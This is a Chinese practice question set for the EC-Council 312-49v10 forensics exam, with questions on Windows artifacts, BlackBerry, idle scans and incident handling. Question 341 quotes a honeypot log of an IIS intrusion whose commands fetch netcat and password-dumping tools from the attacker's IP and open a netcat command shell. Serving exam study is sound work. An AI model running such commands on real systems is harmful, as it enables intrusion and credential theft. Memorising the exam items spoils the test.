通过 EC-COUNCIL 312-49v10 考试与实践测试问题包 [Q340-Q357]

问题 340
Windows XP 启动结束时会处理哪个文件来初始化登录对话框？

问题 341
以下摘录自 lab.wiretrip.net 上的蜜罐日志。Snort 报告了来自 213.116.251.162 的 Unicode 攻击。文件权限规范化漏洞（UNICODE 攻击）允许在通常无权运行脚本的任意文件夹中运行脚本。攻击者尝试使用 Unicode 攻击，最终成功显示 boot.ini。
然后，他转而通过 msadcs.dll 玩 RDS。RDS 漏洞允许恶意用户构建 SQL 语句，在 IIS 服务器上执行 shell 命令（如 CMD.EXE）。攻击者通过快速查询发现目录存在，而对 msadcs.dll 的查询显示该目录运行正常。攻击者进行了一次 RDS 查询，结果运行了如下所示的命令。
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
你能从给出的漏洞中推断出什么？

问题 342
Office 文档（Word、Excel、PowerPoint）包含一个代码，可以跟踪创建文档的机器的 MAC 或唯一标识符。这个代码叫什么？

问题 343
所有黑莓电子邮件最终都是通过 RIM 操作的哪种专有机制收发的？

问题 344
以下哪个命令可以显示 Windows 服务器上运行的所有网络服务？

问题 345
哪种云模式允许调查人员获取虚拟机实例并启动取证检查流程？

问题 346
空闲 "系统也被称为什么？

问题 347
以下哪种网络浏览器使用可扩展存储引擎（ESE）数据库格式来存储浏览记录，包括历史记录、缓存和 cookie？

问题 348
文件分配表中第一个保留扇区的名称是什么？

问题 349
在申请搜查令时，必须

问题 350
为什么基于 Linux/Unix 的计算机比 Windows 计算机更适合用于闲置扫描？

问题 351
这些 Windows 实用程序中，哪个可以帮助您修复逻辑文件系统错误？

问题 352
在 Linux 启动过程中，下列哪些阶段涉及系统硬件的初始化？

问题 353
黑莓设备 Password Keeper 使用什么加密技术？

问题 354
Cylie 正在调查弗洛里达州一家国家机构的网络漏洞。她发现入侵者能够通过超载 IP 数据包进入公司防火墙。Cylie 随后通过调查发现，入侵者侵入了公司的电话系统，并使用 PBX 系统的硬盘驱动器存储共享音乐文件。对公司 PBX 系统的这种攻击叫什么？

问题 355
以下目录中保存了什么内容？HKLMSECURITYPolicySecrets

问题 356
如果攻击者的计算机在 IDLE 扫描中向开放端口上的僵尸计算机发送 IPID 31400，会有什么反应？

问题 357
克里斯被要求调查他的一位客户报告的一起黑客事件。公司怀疑有内部同谋参与了这次攻击。到达事件现场后，克里斯确保物理区域的安全，使用可视 medi a 记录现场情况。他拔掉电源插头，关闭系统，以免以任何方式干扰系统。在断开所有电缆和连接器之前，他会给它们贴上标签。您认为接下来会发生什么事件？